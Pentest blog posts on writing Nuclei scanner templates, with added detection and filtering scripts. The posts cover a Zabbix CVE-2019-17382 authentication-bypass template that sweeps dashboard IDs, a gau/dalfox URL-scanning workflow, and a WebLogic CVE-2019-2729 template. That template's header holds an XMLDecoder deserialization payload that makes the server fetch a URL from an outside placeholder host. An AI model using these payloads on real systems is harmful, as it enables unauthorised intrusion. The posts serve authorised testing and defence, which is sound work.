Wednesday, May 05, 2021

A little small tiny contribution to Nuclei templates

Doing traditional pentests is still fun (the real ones, not the kind that ends with "You have a vulnerable version of XYZ software and, sorry, no evidence of exploitation nor PoC").

One of the latest ones led me to make a small contribution to Nuclei Templates. Yes, pure YAML.

A teammate noticed that the Zabbix installation on one target was vulnerable to authentication bypass. It is a well known vulnerability, so I wanted to know if there was a Nuclei template for it, and yes, there was one. However, Nuclei with that template couldn't find the vulnerability.

The CVE-2019-17382.yaml template had a request like this:

requests:
  - method: GET
    path:
      - '{{BaseURL}}/zabbix.php?action=dashboard.view&dashboardid=1'

The problem is that dashboards can be deleted and then the id changes. I mean, in several installations there is no dashboardid=1, but there may be a 2 or a 12 or whatever.

So the new version of the request makes use of a payload (in this case a file with a list of possible IDs) and switches to a raw request:

requests:

  - payloads:
      ids: helpers/wordlists/numbers.txt

    attack: sniper
    threads: 50

    raw:
      - |
        GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
        Accept-Language: en-US,en;q=0.9
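From the other side of the wire, the template above produces a very recognisable footprint: one client asking for /zabbix.php?action=dashboard.view with many different dashboardid values in a few seconds. The following is an added example (not part of the original post or of the Nuclei project) that parses combined-format access log lines and reports clients doing that, together with how many of those dashboards were actually served with a 200 instead of the redirect to the login page an unauthenticated client should get. The log lines, thresholds and field layout are constructed for the example.

```python
"""Detect dashboardid enumeration against Zabbix in web server access logs.

Added example; not code from the original post or the Nuclei project.
Log lines below are constructed, not captured from a real server.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" format; only the fields used here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict with ip, timestamp, path, action, dashboardid and status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    qs = parse_qs(parts.query)
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "path": parts.path,
        "action": qs.get("action", [None])[0],
        "dashboardid": qs.get("dashboardid", [None])[0],
        "status": int(m.group("status")),
    }


def find_enumeration(lines, min_ids=5, window_seconds=60):
    """Return {ip: {"ids": n, "ok": m}} for every client that requested at least
    `min_ids` distinct dashboardids within `window_seconds`. "ok" counts the
    responses in that window that came back 200 (a dashboard was served); a
    302 to index.php is the expected answer for an unauthenticated client."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if (rec and rec["path"].endswith("/zabbix.php")
                and rec["action"] == "dashboard.view" and rec["dashboardid"]):
            per_ip[rec["ip"]].append(rec)

    findings = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        best = None
        start = 0
        # sliding time window over the sorted requests of this client
        for end in range(len(recs)):
            while (recs[end]["ts"] - recs[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            window = recs[start:end + 1]
            ids = {r["dashboardid"] for r in window}
            if len(ids) >= min_ids and (best is None or len(ids) > best["ids"]):
                best = {"ids": len(ids),
                        "ok": sum(1 for r in window if r["status"] == 200)}
        if best:
            findings[ip] = best
    return findings


# Constructed sample: one client sweeping ids (one of them served), one normal user.
SAMPLE_LOG = """\
203.0.113.5 - - [05/May/2021:10:00:01 +0000] "GET /zabbix.php?action=dashboard.view&dashboardid=1 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [05/May/2021:10:00:01 +0000] "GET /zabbix.php?action=dashboard.view&dashboardid=2 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [05/May/2021:10:00:02 +0000] "GET /zabbix.php?action=dashboard.view&dashboardid=3 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [05/May/2021:10:00:02 +0000] "GET /zabbix.php?action=dashboard.view&dashboardid=4 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [05/May/2021:10:00:03 +0000] "GET /zabbix.php?action=dashboard.view&dashboardid=12 HTTP/1.1" 200 8453 "-" "Mozilla/5.0"
203.0.113.5 - - [05/May/2021:10:00:03 +0000] "GET /zabbix.php?action=dashboard.view&dashboardid=13 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [05/May/2021:10:05:40 +0000] "GET /zabbix.php?action=dashboard.view&dashboardid=12 HTTP/1.1" 200 8453 "-" "Mozilla/5.0"
198.51.100.7 - - [05/May/2021:10:06:02 +0000] "GET /zabbix.php?action=problem.view HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, f in find_enumeration(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {f['ids']} distinct dashboardids, {f['ok']} served with 200")
```

The "ok" counter is the interesting part for triage: a sweep that only ever gets 302s is a scanner probing a patched host, while a 200 inside the sweep means a dashboard was rendered for a client that had not logged in.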

Wednesday, March 03, 2021

Web Vulnerability Scanning based on URLs from Wayback Machine, OTX, Common Crawl

[gau + burp | dalfox]. GAU: gets known URLs for a site from sources such as the Wayback Machine, Common Crawl (kind of a Shodan for URLs) and AlienVault's OTX incident DB. DALFOX: web vulnerability scanner, mainly for XSS.

"getallurls (gau) fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl for any given domain."

GO111MODULE=on go get -u -v github.com/lc/gau

gau -b png,jpg,gif example.com > gau.rpt   # a bunch of URLs with arguments (if they exist on those providers)
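A gau report is usually thousands of lines, most of them static assets or the same endpoint with different parameter values, and every one of them becomes a request once it is piped into Burp or dalfox. The following added example (not part of the original post, nor of gau or dalfox) does the cleanup step in between: it drops static-asset extensions (the equivalent of gau's -b list), keeps only URLs that carry query parameters, and collapses URLs that differ only in parameter values so each parameter set is scanned once. The sample URLs are constructed.

```python
"""Filter a gau report before feeding it to a proxy or scanner.

Added example; not code from the original post, gau or dalfox.
Sample input is constructed.
"""
from urllib.parse import urlsplit, parse_qsl

# Extensions treated as static assets (same role as `gau -b png,jpg,gif`).
STATIC_EXT = {"png", "jpg", "jpeg", "gif", "css", "svg", "woff", "woff2", "ico"}


def url_key(url):
    """Identity used for dedup: scheme, host, path and the sorted parameter NAMES.
    Parameter values are ignored, so /search?q=a and /search?q=b are the same key."""
    p = urlsplit(url)
    names = tuple(sorted(k for k, _ in parse_qsl(p.query, keep_blank_values=True)))
    return (p.scheme, p.netloc.lower(), p.path, names)


def is_static(url):
    """True when the last path segment has a static-asset extension."""
    last = urlsplit(url).path.rsplit("/", 1)[-1]
    ext = last.rsplit(".", 1)[-1].lower() if "." in last else ""
    return ext in STATIC_EXT


def filter_urls(lines, require_params=True):
    """Return the URLs worth scanning, in input order, one per parameter set."""
    seen = set()
    kept = []
    for raw in lines:
        url = raw.strip()
        if not url or urlsplit(url).scheme not in ("http", "https"):
            continue
        if is_static(url):
            continue
        key = url_key(url)
        if require_params and not key[3]:
            continue  # no query parameters: nothing for a parameter-based scanner
        if key in seen:
            continue
        seen.add(key)
        kept.append(url)
    return kept


# Constructed sample of what a gau report looks like.
SAMPLE_GAU = """\
https://example.com/
https://example.com/search?q=test
https://example.com/search?q=other
https://example.com/search?q=x&page=2
https://example.com/img/logo.png?v=3
http://example.com/item?id=1
https://example.com/item?id=1
https://example.com/about
"""

if __name__ == "__main__":
    # Typical use: python3 filter_gau.py < gau.rpt > gau.filtered
    for u in filter_urls(SAMPLE_GAU.splitlines()):
        print(u)
```

Note that http:// and https:// versions of the same URL are deliberately kept apart; whether the plain-HTTP one is worth a request depends on whether the site still answers on it.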


* Chained with Burp :

# httpie; Burp's default listener speaks plain HTTP on 127.0.0.1:8080, so the proxy URL is http://, and both http and https targets are routed through it
while read -r url; do http --verify no --proxy http:http://127.0.0.1:8080 --proxy https:http://127.0.0.1:8080 "$url"; done < gau.rpt


Then run an active scan over them (they will appear in the site map).


* Chained with Dalfox

GO111MODULE=on go get -v github.com/hahwul/dalfox/v2


cat gau.rpt | dalfox pipe

Monday, February 15, 2021

Back to post : Nuclei vulnerability scanner

Repo :  https://github.com/projectdiscovery/nuclei

Get the binary or compile from source.

Download templates :

git clone https://github.com/projectdiscovery/nuclei-templates.git

Nuclei is based on "signatures" for HTTP/HTTPS services (the approach is similar to YARA rules).

It's easy to add "rules" or templates to search for other vulnerabilities and so get another vulnerability scanner: an additional, lightweight one, part of a new kind of scanners that use the same technique (not all of them use YAML).

Notice that it targets low-hanging fruit.

Adding a template for WebLogic:

1. Analyzed how a previous similar vuln was detected (an XML sent by GET).

2. Create a template such as this one:

cat nuclei-templates/weblogic.yaml

id: CVE-2019-2729

info:
  name: WebLogic Deserialization
  author: wcu35745
  severity: high
  #reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2729

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wls-wsat/CoordinatorPortType"
    headers:
      Content-Type: text/xml
      SOAPAction: <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8" class="java.beans.XMLDecoder"><void id="url" class="java.net.URL"><string>http://%s:%d/cve-2017-10271?target=%s%s</string></void><void idref="url"><void id="stream" method = "openStream" /></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>
    # Both matchers must hit. Without this line Nuclei combines them with OR,
    # and any page that answers 200 would be reported.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "weblogic.wsee.wstx.wsat.v10.endpoint.CoordinatorPortTypePortImpl"
        part: body

3. The words come from the response to the request carrying the XML SOAP envelope.

4. Put the URLs to scan in a text file (http:// or https://dns_name_or_IP, one per line, passed with -l) or use the -target parameter for a single target; -t selects the template.

5. If a target is found vulnerable, an output such as this one will appear:

./nuclei -l targets.txt -t nuclei-templates/weblogic.yaml -v -timeout 20 -retries 3

                       __     _ 
     ____  __  _______/ /__  (_)
    / __ \/ / / / ___/ / _ \/ / 
   / / / / /_/ / /__/ /  __/ /  
  /_/ /_/\__,_/\___/_/\___/_/   v1   

projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] [CVE-2019-2729] Loaded template WebLogic Deserialization (@wcu35745) [high]

[CVE-2019-2729] https://ip_address/wls-wsat/CoordinatorPortType

There is no other indication that the target is vulnerable: the result line is printed without the [WRN]/[INF] tag that precedes the other lines.
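The quality of a template like the one above lives entirely in its matchers, and the detail that bites most often is how several matchers are combined: Nuclei joins them with OR unless the request block sets `matchers-condition: and`. The following added example (not code from the original post or the Nuclei project) re-implements just enough of the matcher semantics, `status` and `word` with the `part` and `condition` keys, to run the template's two matchers against three constructed responses and show that without the `and` any page answering 200 is reported as a hit.

```python
"""Evaluate Nuclei-style matchers against HTTP responses.

Added example; not code from the original post or the Nuclei project.
It models only the 'status' and 'word' matcher types and the
matchers-condition / condition keys. Responses are constructed.
"""

# Class name the template above looks for in the response body.
WORD = "weblogic.wsee.wstx.wsat.v10.endpoint.CoordinatorPortTypePortImpl"

# The template's two matchers, as Python dicts instead of YAML.
MATCHERS = [
    {"type": "status", "status": [200]},
    {"type": "word", "words": [WORD], "part": "body"},
]
BLOCK_OR = {"matchers": MATCHERS}                                 # no matchers-condition: default is "or"
BLOCK_AND = {"matchers": MATCHERS, "matchers-condition": "and"}  # the corrected form


def match_one(matcher, response):
    """Evaluate a single matcher of type 'status' or 'word'."""
    mtype = matcher["type"]
    if mtype == "status":
        return response["status"] in matcher["status"]
    if mtype == "word":
        part = matcher.get("part", "body")  # Nuclei's default part is the body
        if part == "body":
            haystack = response["body"]
        else:
            haystack = "\n".join(f"{k}: {v}" for k, v in response["headers"].items())
        words = matcher["words"]
        # 'condition' inside a word matcher: "or" (default) needs any word, "and" needs all
        if matcher.get("condition", "or") == "and":
            return all(w in haystack for w in words)
        return any(w in haystack for w in words)
    raise ValueError(f"unsupported matcher type: {mtype}")


def matches(block, response):
    """Combine the block's matchers with matchers-condition ('or' by default)."""
    results = [match_one(m, response) for m in block["matchers"]]
    if block.get("matchers-condition", "or") == "and":
        return all(results)
    return any(results)


def evaluate(block, responses):
    """Map each named response to whether the block reports it."""
    return {name: matches(block, resp) for name, resp in responses.items()}


# Constructed responses (not captured from a real server).
RESPONSES = {
    "wls-wsat": {"status": 200, "headers": {"Content-Type": "text/html"},
                 "body": f"<html><body>... {WORD} ...</body></html>"},
    "other-page": {"status": 200, "headers": {"Content-Type": "text/html"},
                   "body": "<html><body>Welcome</body></html>"},
    "not-found": {"status": 404, "headers": {}, "body": "Not Found"},
}

if __name__ == "__main__":
    print("default (or):", evaluate(BLOCK_OR, RESPONSES))
    print("with and:    ", evaluate(BLOCK_AND, RESPONSES))
```

Running it shows "other-page" flagged under the default combination and only "wls-wsat" flagged once the condition is `and`, which is exactly the difference between a template that finds the WSAT endpoint and one that reports every live web server in the target list.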